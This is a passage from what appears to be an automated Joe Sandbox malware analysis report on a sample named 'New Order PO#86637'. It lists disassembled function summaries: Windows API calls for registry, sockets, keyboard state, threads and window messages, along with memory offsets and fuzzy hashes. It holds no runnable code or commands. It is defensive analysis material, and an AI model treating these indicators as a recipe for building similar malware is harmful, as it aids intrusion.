                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_malloc
                                                                            • String ID:
                                                                            • API String ID: 1938898002-0
                                                                            • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                            • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                            APIs
                                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                            • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                            • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                            • String ID:
                                                                            • API String ID: 3771399671-0
                                                                            • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                            • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                            • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                            • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                            • _memmove.LIBCMT ref: 0044B555
                                                                            • _memmove.LIBCMT ref: 0044B578
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                            • String ID:
                                                                            • API String ID: 2737351978-0
                                                                            • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                            • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                            • __calloc_crt.LIBCMT ref: 00415246
                                                                            • __getptd.LIBCMT ref: 00415253
                                                                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                            • _free.LIBCMT ref: 0041529E
                                                                            • __dosmaperr.LIBCMT ref: 004152A9
                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 3638380555-0
                                                                            • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                            • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Copy$ClearErrorInitLast
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 3207048006-625585964
                                                                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                            • _memmove.LIBCMT ref: 004656CA
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                            • String ID:
                                                                            • API String ID: 2945290962-0
                                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                            • String ID:
                                                                            • API String ID: 1457242333-0
                                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 15295421-0
                                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                            APIs
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • _wcstok.LIBCMT ref: 004675B2
                                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                            • _wcscpy.LIBCMT ref: 00467641
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                            • _wcslen.LIBCMT ref: 00467793
                                                                            • _wcslen.LIBCMT ref: 004677BD
                                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 780548581-3081909835
                                                                            • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                            • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                            APIs
                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 4082120231-0
                                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                            APIs
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2027346449-0
                                                                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                            APIs
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                            • GetMenu.USER32 ref: 0047A703
                                                                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                            • _wcslen.LIBCMT ref: 0047A79E
                                                                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3257027151-0
                                                                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                            APIs
                                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastselect
                                                                            • String ID:
                                                                            • API String ID: 215497628-0
                                                                            • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                            • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0044443B
                                                                            • GetKeyboardState.USER32(?), ref: 00444450
                                                                            • SetKeyboardState.USER32(?), ref: 004444A4
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
